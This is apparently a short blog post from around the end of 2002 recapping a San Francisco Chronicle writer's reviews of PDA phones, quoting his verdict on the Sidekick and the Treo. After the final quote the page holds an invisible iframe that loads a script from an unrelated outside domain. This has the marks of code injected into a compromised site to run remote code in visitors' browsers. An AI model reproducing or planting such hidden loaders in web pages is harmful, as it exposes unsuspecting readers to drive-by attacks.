Henry Norr, a writer for the
San Francisco Chronicle, recaps his review of pdaPhones throughout 2002. I think that he missed a major segment by ignored the Pocket PC based devices, but he has some interesting observations. I totally agree that this will be a hot area for some time as the market and users continue the dance of function, usability, reliabilty, and affordabilty.
Henry wrote...
"When I sorted through this year's columns, I discovered that I devoted more of them -- five -- to handheld computers with wireless data and (in most cases) voice capabilities built in than to any other product category. "
"Bottom line: At this point, especially with today's aggressive discounts, both the Sidekick and the Treo are attractive products. But if you need a good, up-to-date calendar and address book with your communicator, and you don't already have or don't want to carry a separate PDA, I'd give the nod to the Treo. "
"One thing's for sure: Expect more news in this area in 2003."<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
